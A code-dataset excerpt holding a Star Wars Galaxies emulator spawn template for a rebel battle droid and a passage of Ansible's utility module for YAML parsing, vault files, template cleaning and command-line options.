| text (string, 6-947k chars) | repo_name (string, 5-100 chars) | path (string, 4-231 chars) | language (1 class) | license (15 classes) | size (int64, 6-947k) | score (float64, 0-0.34) |
|---|---|---|---|---|---|---|
import sys
from services.spawn import MobileTemplate
from services.spawn import WeaponTemplate
from resources.datatables import WeaponType
from resources.datatables import Difficulty
from resources.datatables import Options
from resources.datatables import FactionStatus
from java.util import Vector
def addTemplate(core):
mobileTemplate = MobileTemplate()
mobileTemplate.setCreatureName('rebel_battle_droid')
mobileTemplate.setLevel(83)
mobileTemplate.setDifficulty(Difficulty.ELITE)
mobileTemplate.setMinSpawnDistance(4)
mobileTemplate.setMaxSpawnDistance(8)
mobileTemplate.setDeathblow(True)
mobileTemplate.setScale(1)
mobileTemplate.setSocialGroup("rebel")
mobileTemplate.setAssistRange(24)
mobileTemplate.setStalker(False)
mobileTemplate.setFaction("rebel")
mobileTemplate.setFactionStatus(FactionStatus.Combatant)
templates = Vector()
templates.add('object/mobile/shared_battle_droid.iff')
mobileTemplate.setTemplates(templates)
weaponTemplates = Vector()
weapontemplate = WeaponTemplate('object/weapon/ranged/carbine/shared_carbine_e5.iff', WeaponType.CARBINE, 1.0, 15, 'energy')
weaponTemplates.add(weapontemplate)
mobileTemplate.setWeaponTemplateVector(weaponTemplates)
attacks = Vector()
mobileTemplate.setDefaultAttack('rangedShot')
mobileTemplate.setAttacks(attacks)
core.spawnService.addMobileTemplate('battle_droid_rebel', mobileTemplate)
return
| ProjectSWGCore/NGECore2 | scripts/mobiles/generic/faction/rebel/battle_droid_rebel.py | Python | lgpl-3.0 | 1,397 | 0.029349 |
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import errno
import sys
import re
import os
import shlex
import yaml
import copy
import optparse
import operator
from ansible import errors
from ansible import __version__
from ansible.utils.display_functions import *
from ansible.utils.plugins import *
from ansible.utils.su_prompts import *
from ansible.utils.hashing import secure_hash, secure_hash_s, checksum, checksum_s, md5, md5s
from ansible.callbacks import display
from ansible.module_utils.splitter import split_args, unquote
from ansible.module_utils.basic import heuristic_log_sanitize
from ansible.utils.unicode import to_bytes, to_unicode
import ansible.constants as C
from . import pybook
import ast
import pprint
import time
import StringIO
import stat
import termios
import tty
import pipes
import random
import difflib
import warnings
import traceback
import getpass
import sys
import subprocess
import contextlib
from vault import VaultLib
VERBOSITY=0
MAX_FILE_SIZE_FOR_DIFF=1*1024*1024
# caching the compilation of the regex used
# to check for lookup calls within data
LOOKUP_REGEX = re.compile(r'lookup\s*\(')
PRINT_CODE_REGEX = re.compile(r'(?:{[{%]|[%}]})')
CODE_REGEX = re.compile(r'(?:{%|%})')
try:
# simplejson can be much faster if it's available
import simplejson as json
except ImportError:
import json
try:
from yaml import CSafeLoader as Loader
except ImportError:
from yaml import SafeLoader as Loader
PASSLIB_AVAILABLE = False
try:
import passlib.hash
PASSLIB_AVAILABLE = True
except:
pass
try:
import builtin
except ImportError:
import __builtin__ as builtin
KEYCZAR_AVAILABLE=False
try:
try:
# some versions of pycrypto may not have this?
from Crypto.pct_warnings import PowmInsecureWarning
except ImportError:
PowmInsecureWarning = RuntimeWarning
with warnings.catch_warnings(record=True) as warning_handler:
warnings.simplefilter("error", PowmInsecureWarning)
try:
import keyczar.errors as key_errors
from keyczar.keys import AesKey
except PowmInsecureWarning:
system_warning(
"The version of gmp you have installed has a known issue regarding " + \
"timing vulnerabilities when used with pycrypto. " + \
"If possible, you should update it (i.e. yum update gmp)."
)
warnings.resetwarnings()
warnings.simplefilter("ignore")
import keyczar.errors as key_errors
from keyczar.keys import AesKey
KEYCZAR_AVAILABLE=True
except ImportError:
pass
###############################################################
# Abstractions around keyczar
###############################################################
def key_for_hostname(hostname):
# fireball mode is an implementation of ansible firing up zeromq via SSH
# to use no persistent daemons or key management
if not KEYCZAR_AVAILABLE:
raise errors.AnsibleError("python-keyczar must be installed on the control machine to use accelerated modes")
key_path = os.path.expanduser(C.ACCELERATE_KEYS_DIR)
if not os.path.exists(key_path):
os.makedirs(key_path, mode=0700)
os.chmod(key_path, int(C.ACCELERATE_KEYS_DIR_PERMS, 8))
elif not os.path.isdir(key_path):
raise errors.AnsibleError('ACCELERATE_KEYS_DIR is not a directory.')
if stat.S_IMODE(os.stat(key_path).st_mode) != int(C.ACCELERATE_KEYS_DIR_PERMS, 8):
raise errors.AnsibleError('Incorrect permissions on the private key directory. Use `chmod 0%o %s` to correct this issue, and make sure any of the keys files contained within that directory are set to 0%o' % (int(C.ACCELERATE_KEYS_DIR_PERMS, 8), C.ACCELERATE_KEYS_DIR, int(C.ACCELERATE_KEYS_FILE_PERMS, 8)))
key_path = os.path.join(key_path, hostname)
# use new AES keys every 2 hours, which means fireball must not allow running for longer either
if not os.path.exists(key_path) or (time.time() - os.path.getmtime(key_path) > 60*60*2):
key = AesKey.Generate()
fd = os.open(key_path, os.O_WRONLY | os.O_CREAT, int(C.ACCELERATE_KEYS_FILE_PERMS, 8))
fh = os.fdopen(fd, 'w')
fh.write(str(key))
fh.close()
return key
else:
if stat.S_IMODE(os.stat(key_path).st_mode) != int(C.ACCELERATE_KEYS_FILE_PERMS, 8):
raise errors.AnsibleError('Incorrect permissions on the key file for this host. Use `chmod 0%o %s` to correct this issue.' % (int(C.ACCELERATE_KEYS_FILE_PERMS, 8), key_path))
fh = open(key_path)
key = AesKey.Read(fh.read())
fh.close()
return key
def encrypt(key, msg):
return key.Encrypt(msg)
def decrypt(key, msg):
try:
return key.Decrypt(msg)
except key_errors.InvalidSignatureError:
raise errors.AnsibleError("decryption failed")
###############################################################
# UTILITY FUNCTIONS FOR COMMAND LINE TOOLS
###############################################################
def read_vault_file(vault_password_file):
"""Read a vault password from a file or if executable, execute the script and
retrieve password from STDOUT
"""
if vault_password_file:
this_path = os.path.realpath(os.path.expanduser(vault_password_file))
if is_executable(this_path):
try:
# STDERR not captured to make it easier for users to prompt for input in their scripts
p = subprocess.Popen(this_path, stdout=subprocess.PIPE)
except OSError, e:
raise errors.AnsibleError("problem running %s (%s)" % (' '.join(this_path), e))
stdout, stderr = p.communicate()
vault_pass = stdout.strip('\r\n')
else:
try:
f = open(this_path, "rb")
vault_pass=f.read().strip()
f.close()
except (OSError, IOError), e:
raise errors.AnsibleError("Could not read %s: %s" % (this_path, e))
return vault_pass
else:
return None
def err(msg):
''' print an error message to stderr '''
print >> sys.stderr, msg
def exit(msg, rc=1):
''' quit with an error to stdout and a failure code '''
err(msg)
sys.exit(rc)
def jsonify(result, format=False):
    ''' format JSON output (compressed or uncompressed) '''
if result is None:
return "{}"
result2 = result.copy()
for key, value in result2.items():
if type(value) is str:
result2[key] = value.decode('utf-8', 'ignore')
indent = None
if format:
indent = 4
try:
return json.dumps(result2, sort_keys=True, indent=indent, ensure_ascii=False)
except UnicodeDecodeError:
return json.dumps(result2, sort_keys=True, indent=indent)
def write_tree_file(tree, hostname, buf):
''' write something into treedir/hostname '''
# TODO: might be nice to append playbook runs per host in a similar way
# in which case, we'd want append mode.
path = os.path.join(tree, hostname)
fd = open(path, "w+")
fd.write(buf)
fd.close()
def is_failed(result):
''' is a given JSON result a failed result? '''
return ((result.get('rc', 0) != 0) or (result.get('failed', False) in [ True, 'True', 'true']))
def is_changed(result):
''' is a given JSON result a changed result? '''
return (result.get('changed', False) in [ True, 'True', 'true'])
def check_conditional(conditional, basedir, inject, fail_on_undefined=False):
from ansible.utils import template
if conditional is None or conditional == '':
return True
if isinstance(conditional, list):
for x in conditional:
if not check_conditional(x, basedir, inject, fail_on_undefined=fail_on_undefined):
return False
return True
if not isinstance(conditional, basestring):
return conditional
conditional = conditional.replace("jinja2_compare ","")
# allow variable names
if conditional in inject and '-' not in to_unicode(inject[conditional], nonstring='simplerepr'):
conditional = to_unicode(inject[conditional], nonstring='simplerepr')
conditional = template.template(basedir, conditional, inject, fail_on_undefined=fail_on_undefined)
original = to_unicode(conditional, nonstring='simplerepr').replace("jinja2_compare ","")
# a Jinja2 evaluation that results in something Python can eval!
presented = "{%% if %s %%} True {%% else %%} False {%% endif %%}" % conditional
conditional = template.template(basedir, presented, inject)
val = conditional.strip()
if val == presented:
# the templating failed, meaning most likely a
# variable was undefined. If we happened to be
# looking for an undefined variable, return True,
# otherwise fail
if "is undefined" in conditional:
return True
elif "is defined" in conditional:
return False
else:
raise errors.AnsibleError("error while evaluating conditional: %s" % original)
elif val == "True":
return True
elif val == "False":
return False
else:
raise errors.AnsibleError("unable to evaluate conditional: %s" % original)
def is_executable(path):
'''is the given path executable?'''
return (stat.S_IXUSR & os.stat(path)[stat.ST_MODE]
or stat.S_IXGRP & os.stat(path)[stat.ST_MODE]
or stat.S_IXOTH & os.stat(path)[stat.ST_MODE])
def unfrackpath(path):
'''
returns a path that is free of symlinks, environment
variables, relative path traversals and symbols (~)
example:
'$HOME/../../var/mail' becomes '/var/spool/mail'
'''
return os.path.normpath(os.path.realpath(os.path.expandvars(os.path.expanduser(path))))
def prepare_writeable_dir(tree,mode=0777):
''' make sure a directory exists and is writeable '''
# modify the mode to ensure the owner at least
# has read/write access to this directory
mode |= 0700
# make sure the tree path is always expanded
# and normalized and free of symlinks
tree = unfrackpath(tree)
if not os.path.exists(tree):
try:
os.makedirs(tree, mode)
except (IOError, OSError), e:
raise errors.AnsibleError("Could not make dir %s: %s" % (tree, e))
if not os.access(tree, os.W_OK):
raise errors.AnsibleError("Cannot write to path %s" % tree)
return tree
def path_dwim(basedir, given):
'''
make relative paths work like folks expect.
'''
if given.startswith("'"):
given = given[1:-1]
if given.startswith("/"):
return os.path.abspath(given)
elif given.startswith("~"):
return os.path.abspath(os.path.expanduser(given))
else:
if basedir is None:
basedir = "."
return os.path.abspath(os.path.join(basedir, given))
def path_dwim_relative(original, dirname, source, playbook_base, check=True):
''' find one file in a directory one level up in a dir named dirname relative to current '''
# (used by roles code)
from ansible.utils import template
basedir = os.path.dirname(original)
if os.path.islink(basedir):
basedir = unfrackpath(basedir)
template2 = os.path.join(basedir, dirname, source)
else:
template2 = os.path.join(basedir, '..', dirname, source)
source2 = path_dwim(basedir, template2)
if os.path.exists(source2):
return source2
obvious_local_path = path_dwim(playbook_base, source)
if os.path.exists(obvious_local_path):
return obvious_local_path
if check:
raise errors.AnsibleError("input file not found at %s or %s" % (source2, obvious_local_path))
return source2 # which does not exist
def repo_url_to_role_name(repo_url):
# gets the role name out of a repo like
    # "http://git.example.com/repos/repo.git" => "repo"
if '://' not in repo_url and '@' not in repo_url:
return repo_url
trailing_path = repo_url.split('/')[-1]
if trailing_path.endswith('.git'):
trailing_path = trailing_path[:-4]
if trailing_path.endswith('.tar.gz'):
trailing_path = trailing_path[:-7]
if ',' in trailing_path:
trailing_path = trailing_path.split(',')[0]
return trailing_path
def role_spec_parse(role_spec):
# takes a repo and a version like
# git+http://git.example.com/repos/repo.git,v1.0
# and returns a list of properties such as:
# {
# 'scm': 'git',
# 'src': 'http://git.example.com/repos/repo.git',
# 'version': 'v1.0',
# 'name': 'repo'
# }
role_spec = role_spec.strip()
role_version = ''
default_role_versions = dict(git='master', hg='tip')
if role_spec == "" or role_spec.startswith("#"):
return (None, None, None, None)
tokens = [s.strip() for s in role_spec.split(',')]
# assume https://github.com URLs are git+https:// URLs and not
# tarballs unless they end in '.zip'
if 'github.com/' in tokens[0] and not tokens[0].startswith("git+") and not tokens[0].endswith('.tar.gz'):
tokens[0] = 'git+' + tokens[0]
if '+' in tokens[0]:
(scm, role_url) = tokens[0].split('+')
else:
scm = None
role_url = tokens[0]
if len(tokens) >= 2:
role_version = tokens[1]
if len(tokens) == 3:
role_name = tokens[2]
else:
role_name = repo_url_to_role_name(tokens[0])
if scm and not role_version:
role_version = default_role_versions.get(scm, '')
return dict(scm=scm, src=role_url, version=role_version, name=role_name)
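# Illustrative sketch (editorial addition, not from the original module): the role
# spec format documented in the comment above, using the same illustrative URL.
def _example_role_spec():
    return role_spec_parse('git+http://git.example.com/repos/repo.git,v1.0')
    # -> {'scm': 'git', 'src': 'http://git.example.com/repos/repo.git',
    #     'version': 'v1.0', 'name': 'repo'}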
def role_yaml_parse(role):
if 'role' in role:
# Old style: {role: "galaxy.role,version,name", other_vars: "here" }
role_info = role_spec_parse(role['role'])
if isinstance(role_info, dict):
# Warning: Slight change in behaviour here. name may be being
# overloaded. Previously, name was only a parameter to the role.
# Now it is both a parameter to the role and the name that
# ansible-galaxy will install under on the local system.
if 'name' in role and 'name' in role_info:
del role_info['name']
role.update(role_info)
else:
# New style: { src: 'galaxy.role,version,name', other_vars: "here" }
if 'github.com' in role["src"] and 'http' in role["src"] and '+' not in role["src"] and not role["src"].endswith('.tar.gz'):
role["src"] = "git+" + role["src"]
if '+' in role["src"]:
(scm, src) = role["src"].split('+')
role["scm"] = scm
role["src"] = src
if 'name' not in role:
role["name"] = repo_url_to_role_name(role["src"])
if 'version' not in role:
role['version'] = ''
if 'scm' not in role:
role['scm'] = None
return role
def json_loads(data):
''' parse a JSON string and return a data structure '''
try:
loaded = json.loads(data)
except ValueError,e:
raise errors.AnsibleError("Unable to read provided data as JSON: %s" % str(e))
return loaded
def _clean_data(orig_data, from_remote=False, from_inventory=False):
''' remove jinja2 template tags from a string '''
if not isinstance(orig_data, basestring):
return orig_data
# when the data is marked as having come from a remote, we always
# replace any print blocks (ie. {{var}}), however when marked as coming
# from inventory we only replace print blocks that contain a call to
    # a lookup plugin (ie. {{lookup('foo','bar')}})
replace_prints = from_remote or (from_inventory and '{{' in orig_data and LOOKUP_REGEX.search(orig_data) is not None)
regex = PRINT_CODE_REGEX if replace_prints else CODE_REGEX
with contextlib.closing(StringIO.StringIO(orig_data)) as data:
# these variables keep track of opening block locations, as we only
# want to replace matched pairs of print/block tags
print_openings = []
block_openings = []
for mo in regex.finditer(orig_data):
token = mo.group(0)
token_start = mo.start(0)
if token[0] == '{':
if token == '{%':
block_openings.append(token_start)
elif token == '{{':
print_openings.append(token_start)
elif token[1] == '}':
prev_idx = None
if token == '%}' and block_openings:
prev_idx = block_openings.pop()
elif token == '}}' and print_openings:
prev_idx = print_openings.pop()
if prev_idx is not None:
# replace the opening
data.seek(prev_idx, os.SEEK_SET)
data.write('{#')
# replace the closing
data.seek(token_start, os.SEEK_SET)
data.write('#}')
else:
assert False, 'Unhandled regex match'
return data.getvalue()
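# Illustrative sketch (editorial addition, not from the original module): when data is
# marked as coming from a remote, matched {{ }} print blocks are neutralized into
# inert {# #} comments. The lookup call below is illustrative.
def _example_clean_data():
    return _clean_data("ping {{ lookup('pipe', 'id') }}", from_remote=True)
    # -> "ping {# lookup('pipe', 'id') #}"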
def _clean_data_struct(orig_data, from_remote=False, from_inventory=False):
'''
walk a complex data structure, and use _clean_data() to
remove any template tags that may exist
'''
if not from_remote and not from_inventory:
        raise errors.AnsibleError("when cleaning data, you must specify either from_remote or from_inventory")
if isinstance(orig_data, dict):
data = orig_data.copy()
for key in data:
new_key = _clean_data_struct(key, from_remote, from_inventory)
new_val = _clean_data_struct(data[key], from_remote, from_inventory)
if key != new_key:
del data[key]
data[new_key] = new_val
elif isinstance(orig_data, list):
data = orig_data[:]
for i in range(0, len(data)):
data[i] = _clean_data_struct(data[i], from_remote, from_inventory)
elif isinstance(orig_data, basestring):
data = _clean_data(orig_data, from_remote, from_inventory)
else:
data = orig_data
return data
def parse_json(raw_data, from_remote=False, from_inventory=False, no_exceptions=False):
''' this version for module return data only '''
orig_data = raw_data
# ignore stuff like tcgetattr spewage or other warnings
data = filter_leading_non_json_lines(raw_data)
try:
results = json.loads(data)
except:
if no_exceptions:
return dict(failed=True, parsed=False, msg=raw_data)
else:
raise
if from_remote:
results = _clean_data_struct(results, from_remote, from_inventory)
return results
def serialize_args(args):
'''
Flattens a dictionary args to a k=v string
'''
module_args = ""
for (k,v) in args.iteritems():
if isinstance(v, basestring):
module_args = "%s=%s %s" % (k, pipes.quote(v), module_args)
elif isinstance(v, bool):
module_args = "%s=%s %s" % (k, str(v), module_args)
return module_args.strip()
def merge_module_args(current_args, new_args):
'''
merges either a dictionary or string of k=v pairs with another string of k=v pairs,
and returns a new k=v string without duplicates.
'''
if not isinstance(current_args, basestring):
raise errors.AnsibleError("expected current_args to be a basestring")
# we use parse_kv to split up the current args into a dictionary
final_args = parse_kv(current_args)
if isinstance(new_args, dict):
final_args.update(new_args)
elif isinstance(new_args, basestring):
new_args_kv = parse_kv(new_args)
final_args.update(new_args_kv)
return serialize_args(final_args)
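# Illustrative sketch (editorial addition, assumed usage, not from the original module):
# new_args (a dict or a k=v string) overrides keys already present in current_args.
# Values are illustrative and the ordering of the returned k=v string is not guaranteed.
def _example_merge_module_args():
    return merge_module_args("src=/tmp/a.txt mode=0644", dict(mode="0600"))
    # -> e.g. 'mode=0600 src=/tmp/a.txt'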
def parse_yaml(data, path_hint=None):
''' convert a yaml string to a data structure. Also supports JSON, ssssssh!!!'''
stripped_data = data.lstrip()
loaded = None
if stripped_data.startswith("{") or stripped_data.startswith("["):
# since the line starts with { or [ we can infer this is a JSON document.
try:
loaded = json.loads(data)
except ValueError, ve:
if path_hint:
raise errors.AnsibleError(path_hint + ": " + str(ve))
else:
raise errors.AnsibleError(str(ve))
else:
# else this is pretty sure to be a YAML document
loaded = yaml.load(data, Loader=Loader)
return loaded
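# Illustrative sketch (editorial addition, not from the original module): as the
# docstring hints, parse_yaml also accepts JSON, since a document starting with
# '{' or '[' is handed to the json loader first.
def _example_parse_yaml():
    return parse_yaml('{"hosts": "all", "gather_facts": false}')
    # -> {'hosts': 'all', 'gather_facts': False}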
def process_common_errors(msg, probline, column):
replaced = probline.replace(" ","")
if ":{{" in replaced and "}}" in replaced:
msg = msg + """
This one looks easy to fix. YAML thought it was looking for the start of a
hash/dictionary and was confused to see a second "{". Most likely this was
meant to be an ansible template evaluation instead, so we have to give the
parser a small hint that we wanted a string instead. The solution here is to
just quote the entire value.
For instance, if the original line was:
app_path: {{ base_path }}/foo
It should be written as:
app_path: "{{ base_path }}/foo"
"""
return msg
elif len(probline) and len(probline) > 1 and len(probline) > column and probline[column] == ":" and probline.count(':') > 1:
msg = msg + """
This one looks easy to fix. There seems to be an extra unquoted colon in the line
and this is confusing the parser. It was only expecting to find one free
colon. The solution is just add some quotes around the colon, or quote the
entire line after the first colon.
For instance, if the original line was:
copy: src=file.txt dest=/path/filename:with_colon.txt
It can be written as:
copy: src=file.txt dest='/path/filename:with_colon.txt'
Or:
copy: 'src=file.txt dest=/path/filename:with_colon.txt'
"""
return msg
else:
parts = probline.split(":")
if len(parts) > 1:
middle = parts[1].strip()
match = False
unbalanced = False
if middle.startswith("'") and not middle.endswith("'"):
match = True
elif middle.startswith('"') and not middle.endswith('"'):
match = True
            if len(middle) > 0 and middle[0] in [ '"', "'" ] and middle[-1] in [ '"', "'" ] and (probline.count("'") > 2 or probline.count('"') > 2):
unbalanced = True
if match:
msg = msg + """
This one looks easy to fix. It seems that there is a value started
with a quote, and the YAML parser is expecting to see the line ended
with the same kind of quote. For instance:
when: "ok" in result.stdout
Could be written as:
when: '"ok" in result.stdout'
or equivalently:
when: "'ok' in result.stdout"
"""
return msg
if unbalanced:
msg = msg + """
We could be wrong, but this one looks like it might be an issue with
unbalanced quotes. If starting a value with a quote, make sure the
line ends with the same set of quotes. For instance this arbitrary
example:
foo: "bad" "wolf"
Could be written as:
foo: '"bad" "wolf"'
"""
return msg
return msg
def process_yaml_error(exc, data, path=None, show_content=True):
if hasattr(exc, 'problem_mark'):
mark = exc.problem_mark
if show_content:
if mark.line -1 >= 0:
before_probline = data.split("\n")[mark.line-1]
else:
before_probline = ''
probline = data.split("\n")[mark.line]
arrow = " " * mark.column + "^"
msg = """Syntax Error while loading YAML script, %s
Note: The error may actually appear before this position: line %s, column %s
%s
%s
%s""" % (path, mark.line + 1, mark.column + 1, before_probline, probline, arrow)
unquoted_var = None
if '{{' in probline and '}}' in probline:
if '"{{' not in probline or "'{{" not in probline:
unquoted_var = True
if not unquoted_var:
msg = process_common_errors(msg, probline, mark.column)
else:
msg = msg + """
We could be wrong, but this one looks like it might be an issue with
missing quotes. Always quote template expression brackets when they
start a value. For instance:
with_items:
- {{ foo }}
Should be written as:
with_items:
- "{{ foo }}"
"""
else:
# most likely displaying a file with sensitive content,
# so don't show any of the actual lines of yaml just the
# line number itself
msg = """Syntax error while loading YAML script, %s
The error appears to have been on line %s, column %s, but may actually
be before there depending on the exact syntax problem.
""" % (path, mark.line + 1, mark.column + 1)
else:
# No problem markers means we have to throw a generic
# "stuff messed up" type message. Sry bud.
if path:
msg = "Could not parse YAML. Check over %s again." % path
else:
msg = "Could not parse YAML."
raise errors.AnsibleYAMLValidationFailed(msg)
def parse_yaml_from_file(path, vault_password=None):
''' convert a yaml file to a data structure '''
data = None
show_content = True
try:
data = open(path).read()
except IOError:
raise errors.AnsibleError("file could not read: %s" % path)
vault = VaultLib(password=vault_password)
if vault.is_encrypted(data):
# if the file is encrypted and no password was specified,
# the decrypt call would throw an error, but we check first
# since the decrypt function doesn't know the file name
if vault_password is None:
raise errors.AnsibleError("A vault password must be specified to decrypt %s" % path)
data = vault.decrypt(data)
show_content = False
if re.match("#!.*python", data):
result = pybook.run_pybook(path)
else:
try:
result = parse_yaml(data, path_hint=path)
except yaml.YAMLError, exc:
process_yaml_error(exc, data, path, show_content)
if VERBOSITY >= 3:
display("""Structure of file "%s":\n%s\n""" % (path, pprint.pformat(result)), color='yellow')
return result
def parse_kv(args):
''' convert a string of key/value items to a dict '''
options = {}
if args is not None:
try:
vargs = split_args(args)
except ValueError, ve:
if 'no closing quotation' in str(ve).lower():
raise errors.AnsibleError("error parsing argument string, try quoting the entire line.")
else:
raise
for x in vargs:
if "=" in x:
k, v = x.split("=",1)
options[k.strip()] = unquote(v.strip())
return options
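# Illustrative sketch (editorial addition, assumed usage, not from the original module):
# key=value parsing with a quoted value (paths are illustrative); quotes around a
# value are stripped by unquote().
def _example_parse_kv():
    return parse_kv("src=/tmp/a.txt dest='/tmp/dir with space/b.txt'")
    # -> {'src': '/tmp/a.txt', 'dest': '/tmp/dir with space/b.txt'}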
def _validate_both_dicts(a, b):
if not (isinstance(a, dict) and isinstance(b, dict)):
raise errors.AnsibleError(
"failed to combine variables, expected dicts but got a '%s' and a '%s'" % (type(a).__name__, type(b).__name__)
)
def merge_hash(a, b):
''' recursively merges hash b into a
keys from b take precedence over keys from a '''
result = {}
# we check here as well as in combine_vars() since this
# function can work recursively with nested dicts
_validate_both_dicts(a, b)
for dicts in a, b:
# next, iterate over b keys and values
for k, v in dicts.iteritems():
# if there's already such key in a
# and that key contains dict
if k in result and isinstance(result[k], dict):
# merge those dicts recursively
result[k] = merge_hash(a[k], v)
else:
# otherwise, just copy a value from b to a
result[k] = v
return result
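# Illustrative sketch (editorial addition, not from the original module): keys from b
# take precedence and nested dicts are merged recursively, as the docstring states.
def _example_merge_hash():
    return merge_hash({'a': {'x': 1}, 'c': 1}, {'a': {'y': 2}, 'c': 2})
    # -> {'a': {'x': 1, 'y': 2}, 'c': 2}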
def default(value, function):
''' syntactic sugar around lazy evaluation of defaults '''
if value is None:
return function()
return value
def _git_repo_info(repo_path):
''' returns a string containing git branch, commit id and commit date '''
result = None
if os.path.exists(repo_path):
# Check if the .git is a file. If it is a file, it means that we are in a submodule structure.
if os.path.isfile(repo_path):
try:
gitdir = yaml.safe_load(open(repo_path)).get('gitdir')
                # the gitdir value read from the .git file may be an absolute path
if os.path.isabs(gitdir):
repo_path = gitdir
else:
repo_path = os.path.join(repo_path[:-4], gitdir)
except (IOError, AttributeError):
return ''
f = open(os.path.join(repo_path, "HEAD"))
branch = f.readline().split('/')[-1].rstrip("\n")
f.close()
branch_path = os.path.join(repo_path, "refs", "heads", branch)
if os.path.exists(branch_path):
f = open(branch_path)
commit = f.readline()[:10]
f.close()
else:
# detached HEAD
commit = branch[:10]
branch = 'detached HEAD'
branch_path = os.path.join(repo_path, "HEAD")
date = time.localtime(os.stat(branch_path).st_mtime)
if time.daylight == 0:
offset = time.timezone
else:
offset = time.altzone
result = "({0} {1}) last updated {2} (GMT {3:+04d})".format(branch, commit,
time.strftime("%Y/%m/%d %H:%M:%S", date), offset / -36)
else:
result = ''
return result
def _gitinfo():
basedir = os.path.join(os.path.dirname(__file__), '..', '..', '..')
repo_path = os.path.join(basedir, '.git')
result = _git_repo_info(repo_path)
submodules = os.path.join(basedir, '.gitmodules')
if not os.path.exists(submodules):
return result
f = open(submodules)
for line in f:
tokens = line.strip().split(' ')
if tokens[0] == 'path':
submodule_path = tokens[2]
submodule_info =_git_repo_info(os.path.join(basedir, submodule_path, '.git'))
if not submodule_info:
submodule_info = ' not found - use git submodule update --init ' + submodule_path
result += "\n {0}: {1}".format(submodule_path, submodule_info)
f.close()
return result
def version(prog):
result = "{0} {1}".format(prog, __version__)
gitinfo = _gitinfo()
if gitinfo:
result = result + " {0}".format(gitinfo)
result = result + "\n configured module search path = %s" % C.DEFAULT_MODULE_PATH
return result
def version_info(gitinfo=False):
if gitinfo:
        # expensive call, use with care
ansible_version_string = version('')
else:
ansible_version_string = __version__
ansible_version = ansible_version_string.split()[0]
ansible_versions = ansible_version.split('.')
for counter in range(len(ansible_versions)):
if ansible_versions[counter] == "":
ansible_versions[counter] = 0
try:
ansible_versions[counter] = int(ansible_versions[counter])
except:
pass
if len(ansible_versions) < 3:
for counter in range(len(ansible_versions), 3):
ansible_versions.append(0)
return {'string': ansible_version_string.strip(),
'full': ansible_version,
'major': ansible_versions[0],
'minor': ansible_versions[1],
'revision': ansible_versions[2]}
def getch():
''' read in a single character '''
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def sanitize_output(arg_string):
''' strips private info out of a string '''
private_keys = ('password', 'login_password')
output = []
for part in arg_string.split():
try:
(k, v) = part.split('=', 1)
except ValueError:
v = heuristic_log_sanitize(part)
output.append(v)
continue
if k in private_keys:
v = 'VALUE_HIDDEN'
else:
v = heuristic_log_sanitize(v)
output.append('%s=%s' % (k, v))
output = ' '.join(output)
return output
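# Illustrative sketch (editorial addition, assumed usage, not from the original module):
# values of the known private keys above are masked before logging; the argument
# string below is illustrative.
def _example_sanitize_output():
    return sanitize_output('login_password=hunter2 name=web01')
    # -> 'login_password=VALUE_HIDDEN name=web01'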
####################################################################
# option handling code for /usr/bin/ansible and ansible-playbook
# below this line
class SortedOptParser(optparse.OptionParser):
'''Optparser which sorts the options by opt before outputting --help'''
def format_help(self, formatter=None):
self.option_list.sort(key=operator.methodcaller('get_opt_string'))
return optparse.OptionParser.format_help(self, formatter=None)
def increment_debug(option, opt, value, parser):
global VERBOSITY
VERBOSITY += 1
def base_parser(constants=C, usage="", output_opts=False, runas_opts=False,
async_opts=False, connect_opts=False, subset_opts=False, check_opts=False, diff_opts=False):
''' create an options parser for any ansible script '''
parser = SortedOptParser(usage, version=version("%prog"))
parser.add_option('-v','--verbose', default=False, action="callback",
callback=increment_debug, help="verbose mode (-vvv for more, -vvvv to enable connection debugging)")
parser.add_option('-f','--forks', dest='forks', default=constants.DEFAULT_FORKS, type='int',
help="specify number of parallel processes to use (default=%s)" % constants.DEFAULT_FORKS)
parser.add_option('-i', '--inventory-file', dest='inventory',
help="specify inventory host file (default=%s)" % constants.DEFAULT_HOST_LIST,
default=constants.DEFAULT_HOST_LIST)
parser.add_option('-e', '--extra-vars', dest="extra_vars", action="append",
help="set additional variables as key=value or YAML/JSON", default=[])
parser.add_option('-u', '--user', default=constants.DEFAULT_REMOTE_USER, dest='remote_user',
help='connect as this user (default=%s)' % constants.DEFAULT_REMOTE_USER)
parser.add_option('-k', '--ask-pass', default=False, dest='ask_pass', action='store_true',
help='ask for SSH password')
parser.add_option('--private-key', default=constants.DEFAULT_PRIVATE_KEY_FILE, dest='private_key_file',
help='use this file to authenticate the connection')
parser.add_option('--ask-vault-pass', default=False, dest='ask_vault_pass', action='store_true',
help='ask for vault password')
parser.add_option('--vault-password-file', default=constants.DEFAULT_VAULT_PASSWORD_FILE,
dest='vault_password_file', help="vault password file")
parser.add_option('--list-hosts', dest='listhosts', action='store_true',
help='outputs a list of matching hosts; does not execute anything else')
parser.add_option('-M', '--module-path', dest='module_path',
help="specify path(s) to module library (default=%s)" % constants.DEFAULT_MODULE_PATH,
default=None)
if subset_opts:
parser.add_option('-l', '--limit', default=constants.DEFAULT_SUBSET, dest='subset',
help='further limit selected hosts to an additional pattern')
parser.add_option('-T', '--timeout', default=constants.DEFAULT_TIMEOUT, type='int',
dest='timeout',
help="override the SSH timeout in seconds (default=%s)" % constants.DEFAULT_TIMEOUT)
if output_opts:
parser.add_option('-o', '--one-line', dest='one_line', action='store_true',
help='condense output')
parser.add_option('-t', '--tree', dest='tree', default=None,
help='log output to this directory')
if runas_opts:
# priv user defaults to root later on to enable detecting when this option was given here
parser.add_option('-K', '--ask-sudo-pass', default=constants.DEFAULT_ASK_SUDO_PASS, dest='ask_sudo_pass', action='store_true',
help='ask for sudo password (deprecated, use become)')
parser.add_option('--ask-su-pass', default=constants.DEFAULT_ASK_SU_PASS, dest='ask_su_pass', action='store_true',
help='ask for su password (deprecated, use become)')
